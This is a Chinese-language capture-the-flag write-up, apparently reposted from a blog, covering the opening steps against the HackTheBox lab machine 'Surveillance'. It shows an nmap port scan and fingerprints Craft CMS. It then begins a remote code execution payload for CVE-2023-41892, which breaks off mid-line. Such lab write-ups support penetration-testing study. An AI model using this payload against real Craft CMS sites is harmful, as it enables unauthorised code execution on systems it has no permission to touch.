[渗透测试学习] Surveillance -HackTheBox

发布时间:2024年01月12日

文章目录

信息搜集

nmap扫描端口

nmap -sV -sC -v -p- --min-rate 1000 10.10.11.245

在这里插入图片描述

扫出来两个端口,其中80端口有http服务并且重定向到surveillance.htb

那么我们添加下域名然后访问80端口,发现是企业网站尝试扫描子域名和目录无果后,用Wappalyzer插件看看

在这里插入图片描述

得知是Craft CMS后,去网上搜一下发现存在远程代码执行漏洞(CVE-2023-41892) 参考文章

payload

action=conditions/render&test[userCondition]=craft\elements\con
文章来源:https://blog.csdn.net/m0_73512445/article/details/135540843
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
最新文章